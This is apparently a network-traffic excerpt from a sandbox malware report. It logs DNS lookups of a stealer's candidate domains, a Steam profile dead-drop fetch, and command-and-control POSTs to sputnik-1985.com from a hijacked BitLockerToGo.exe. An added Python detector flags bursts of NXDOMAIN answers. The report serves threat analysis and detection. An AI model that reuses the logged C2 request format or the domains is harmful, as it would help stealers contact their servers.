Jan 10, 2025 11:34:39.113141060 CET | 62017 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.113154888 CET | 443 | 62017 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.685358047 CET | 443 | 62017 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.685436964 CET | 443 | 62017 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.685508966 CET | 62017 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.685676098 CET | 62017 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.685688972 CET | 443 | 62017 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.837852001 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.837862968 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.837964058 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.838355064 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:39.838366032 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.315154076 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.315229893 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.316433907 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.316443920 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.316685915 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.318182945 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.318219900 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.318276882 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.780596018 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.780854940 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.780925035 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.781073093 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.781086922 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:40.781097889 CET | 62024 | 443 | 192.168.2.5 | 104.21.48.1
Jan 10, 2025 11:34:40.781101942 CET | 443 | 62024 | 104.21.48.1 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Jan 10, 2025 11:34:27.592979908 CET | 49919 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.602564096 CET | 53 | 49919 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.613414049 CET | 51023 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.622258902 CET | 53 | 51023 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.623847008 CET | 63976 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.633722067 CET | 53 | 63976 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.636199951 CET | 65283 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.645395041 CET | 53 | 65283 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.646656036 CET | 57991 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.655909061 CET | 53 | 57991 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.658560991 CET | 57035 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.670572042 CET | 53 | 57035 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.673815012 CET | 58483 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.683118105 CET | 53 | 58483 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.684905052 CET | 50267 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.693346024 CET | 53 | 50267 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.695225000 CET | 55149 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.705284119 CET | 53 | 55149 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:27.707674026 CET | 57112 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:27.714346886 CET | 53 | 57112 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:29.009962082 CET | 55852 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:29.019952059 CET | 53 | 55852 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:33.597028017 CET | 53 | 59261 | 162.159.36.2 | 192.168.2.5
Jan 10, 2025 11:34:34.088170052 CET | 65068 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:34.095875025 CET | 53 | 65068 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 11:34:46.350358963 CET | 62182 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 11:34:46.359170914 CET | 53 | 62182 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 10, 2025 11:34:27.592979908 CET | 192.168.2.5 | 1.1.1.1 | 0xda3a | Standard query (0) | enterwahsh.biz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.613414049 CET | 192.168.2.5 | 1.1.1.1 | 0xfee1 | Standard query (0) | wordyfindy.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.623847008 CET | 192.168.2.5 | 1.1.1.1 | 0x102f | Standard query (0) | slipperyloo.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.636199951 CET | 192.168.2.5 | 1.1.1.1 | 0xe069 | Standard query (0) | manyrestro.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.646656036 CET | 192.168.2.5 | 1.1.1.1 | 0x51cd | Standard query (0) | shapestickyr.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.658560991 CET | 192.168.2.5 | 1.1.1.1 | 0xde78 | Standard query (0) | talkynicer.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.673815012 CET | 192.168.2.5 | 1.1.1.1 | 0x82f2 | Standard query (0) | curverpluch.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.684905052 CET | 192.168.2.5 | 1.1.1.1 | 0xf2b6 | Standard query (0) | tentabatte.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.695225000 CET | 192.168.2.5 | 1.1.1.1 | 0x260 | Standard query (0) | bashfulacid.lat | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.707674026 CET | 192.168.2.5 | 1.1.1.1 | 0x5b7d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.009962082 CET | 192.168.2.5 | 1.1.1.1 | 0xba25 | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:34.088170052 CET | 192.168.2.5 | 1.1.1.1 | 0xb433 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 11:34:46.350358963 CET | 192.168.2.5 | 1.1.1.1 | 0x94b2 | Standard query (0) | 53.210.109.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 10, 2025 11:34:27.602564096 CET | 1.1.1.1 | 192.168.2.5 | 0xda3a | Name error (3) | enterwahsh.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.622258902 CET | 1.1.1.1 | 192.168.2.5 | 0xfee1 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.633722067 CET | 1.1.1.1 | 192.168.2.5 | 0x102f | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.645395041 CET | 1.1.1.1 | 192.168.2.5 | 0xe069 | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.655909061 CET | 1.1.1.1 | 192.168.2.5 | 0x51cd | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.670572042 CET | 1.1.1.1 | 192.168.2.5 | 0xde78 | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.683118105 CET | 1.1.1.1 | 192.168.2.5 | 0x82f2 | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.693346024 CET | 1.1.1.1 | 192.168.2.5 | 0xf2b6 | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.705284119 CET | 1.1.1.1 | 192.168.2.5 | 0x260 | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:27.714346886 CET | 1.1.1.1 | 192.168.2.5 | 0x5b7d | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:29.019952059 CET | 1.1.1.1 | 192.168.2.5 | 0xba25 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:34:34.095875025 CET | 1.1.1.1 | 192.168.2.5 | 0xb433 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 11:34:46.359170914 CET | 1.1.1.1 | 192.168.2.5 | 0x94b2 | Name error (3) | 53.210.109.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
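The nine consecutive NXDOMAIN answers at 11:34:27 are what the "Tries to resolve many domain names, but no domain seems valid" signature fires on: the sample walks a built-in list of candidate hosts until one resolves. The first successful lookup after the burst is steamcommunity.com (the profile fetch in the HTTP section below), and sputnik-1985.com resolves 1.3 s after that. The following is an added example, not part of the Joe Sandbox report, that runs exactly that check over the answer rows above (copied from the table; timestamps are parsed in the report's own "Jan 10, 2025 11:34:27.602564096 CET" format, zone dropped since only deltas matter). The 10 s window and the threshold of five failures are arbitrary starting values, not something the report states.

```python
"""Flag a client that burns through candidate domains (NXDOMAIN after NXDOMAIN) and then
successfully resolves something else within the same window.

Added example for this report; the DNS_ANSWERS rows are copied from the report's DNS
answers table. Window and threshold are assumed tuning values.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional

# (timestamp, client, reply code, name, record type, address) as listed in the report.
DNS_ANSWERS = [
    ("Jan 10, 2025 11:34:27.602564096 CET", "192.168.2.5", 3, "enterwahsh.biz", "A", None),
    ("Jan 10, 2025 11:34:27.622258902 CET", "192.168.2.5", 3, "wordyfindy.lat", "A", None),
    ("Jan 10, 2025 11:34:27.633722067 CET", "192.168.2.5", 3, "slipperyloo.lat", "A", None),
    ("Jan 10, 2025 11:34:27.645395041 CET", "192.168.2.5", 3, "manyrestro.lat", "A", None),
    ("Jan 10, 2025 11:34:27.655909061 CET", "192.168.2.5", 3, "shapestickyr.lat", "A", None),
    ("Jan 10, 2025 11:34:27.670572042 CET", "192.168.2.5", 3, "talkynicer.lat", "A", None),
    ("Jan 10, 2025 11:34:27.683118105 CET", "192.168.2.5", 3, "curverpluch.lat", "A", None),
    ("Jan 10, 2025 11:34:27.693346024 CET", "192.168.2.5", 3, "tentabatte.lat", "A", None),
    ("Jan 10, 2025 11:34:27.705284119 CET", "192.168.2.5", 3, "bashfulacid.lat", "A", None),
    ("Jan 10, 2025 11:34:27.714346886 CET", "192.168.2.5", 0, "steamcommunity.com", "A", "104.102.49.254"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.48.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.16.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.32.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.112.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.80.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.64.1"),
    ("Jan 10, 2025 11:34:29.019952059 CET", "192.168.2.5", 0, "sputnik-1985.com", "A", "104.21.96.1"),
    ("Jan 10, 2025 11:34:34.095875025 CET", "192.168.2.5", 3, "198.187.3.20.in-addr.arpa", "PTR", None),
    ("Jan 10, 2025 11:34:46.359170914 CET", "192.168.2.5", 3, "53.210.109.20.in-addr.arpa", "PTR", None),
]

EPOCH = datetime(1970, 1, 1)


def parse_report_ts(s):
    """'Jan 10, 2025 11:34:27.602564096 CET' -> seconds. The zone suffix is dropped and the
    nanosecond field truncated to the six digits strptime's %f accepts."""
    stamp = s.rsplit(" ", 1)[0]
    whole, frac = stamp.split(".")
    dt = datetime.strptime(f"{whole}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return (dt - EPOCH).total_seconds()


@dataclass
class Answer:
    ts: float
    client: str
    rcode: int
    name: str
    rtype: str
    addr: Optional[str]


@dataclass
class Burst:
    client: str
    failed: list                                  # names that came back NXDOMAIN, in order
    pivots: dict = field(default_factory=dict)    # name -> addresses resolved right after the burst


def parse_rows(rows):
    return sorted((Answer(parse_report_ts(t), c, rc, n, rt, a) for t, c, rc, n, rt, a in rows),
                  key=lambda x: x.ts)


def find_nxdomain_bursts(answers, window_s=10.0, min_failures=5):
    """Per client: group A/AAAA NXDOMAINs that fall within window_s of the first one; if a group
    has at least min_failures entries, report it together with every name that resolved
    successfully within window_s after the group's last failure. PTR lookups are ignored."""
    by_client = defaultdict(list)
    for a in answers:
        by_client[a.client].append(a)
    bursts = []
    for client, rows in by_client.items():
        failures = [r for r in rows if r.rtype in ("A", "AAAA") and r.rcode == 3]
        successes = [r for r in rows if r.rtype in ("A", "AAAA") and r.rcode == 0]
        i = 0
        while i < len(failures):
            j = i
            while j + 1 < len(failures) and failures[j + 1].ts - failures[i].ts <= window_s:
                j += 1
            group = failures[i:j + 1]
            if len(group) >= min_failures:
                last = group[-1].ts
                burst = Burst(client, [f.name for f in group])
                for s in successes:
                    if last <= s.ts <= last + window_s:
                        burst.pivots.setdefault(s.name, []).append(s.addr)
                bursts.append(burst)
            i = j + 1
    return bursts


if __name__ == "__main__":
    for b in find_nxdomain_bursts(parse_rows(DNS_ANSWERS)):
        print(f"{b.client}: {len(b.failed)} NXDOMAINs ({b.failed[0]} ... {b.failed[-1]}), "
              f"then resolved: {', '.join(b.pivots)}")
```

Fed from a resolver log or Zeek dns.log this gives you both halves of the indicator: the dead candidate list (worth adding to a watchlist, since it is compiled into the sample and will be reused) and the live pivot. Block on the name, not on the 104.21.x.1 addresses, which are Cloudflare anycast and shared with unrelated sites.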
• steamcommunity.com
• sputnik-1985.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.5 | 49770 | 104.102.49.254 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
--- | --- | --- | ---
2025-01-10 10:34:28 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2025-01-10 10:34:28 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 10 Jan 2025 10:34:28 GMT
Content-Length: 35126
Connection: close
Set-Cookie: sessionid=9cf190a5d991b4bebe33d12e; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 10:34:28 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 10:34:28 UTC | 16384 | IN | Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 10:34:28 UTC | 3768 | IN | Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 10:34:28 UTC | 495 | IN | Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                            Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49780 | 104.21.48.1 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:29 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sputnik-1985.com
2025-01-10 10:34:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2025-01-10 10:34:29 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:34:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=mhnh1nk4hl94prbe9r05mc29gb; expires=Tue, 06 May 2025 04:21:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfnfADT1o6BkEsukU0MBpCJ7FWsrh5kmj5TRfIKw8tan1A4%2FX4auk0ApqAs2%2F%2FH08l0RMUOeWMa%2BV6zFk4FlxSplm59YlsEfp2hcsKLh%2F67cLYb2BPDAQlXBpLu4E%2BnV5YvX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc03ceba9e43be-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1544&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1806930&cwnd=226&unsent_bytes=0&cid=d93fd9b1dec438d7&ts=445&x=0"
2025-01-10 10:34:29 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2025-01-10 10:34:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49787 | 104.21.48.1 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:30 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 86
    Host: sputnik-1985.com
2025-01-10 10:34:30 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--bd4e81951306&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 10:34:30 UTC | 1117 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:34:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=elph9dbe4i5vh6lbte98gjfh15; expires=Tue, 06 May 2025 04:21:09 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BuByb7wewoRNzuSlAIoaXGi76K15RLW15rN3K9RBBi3uvGXzogO6hdGqSdYFry6ErWoaJExrLBOVF5zIGQgb89eq6st3hoIeZcawLBItA8r4FQlImlKvqfsbtr0zVnUjTkX"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc03d4fe2cc323-EWR
    alt-svc: h3=":443"; ma=86400
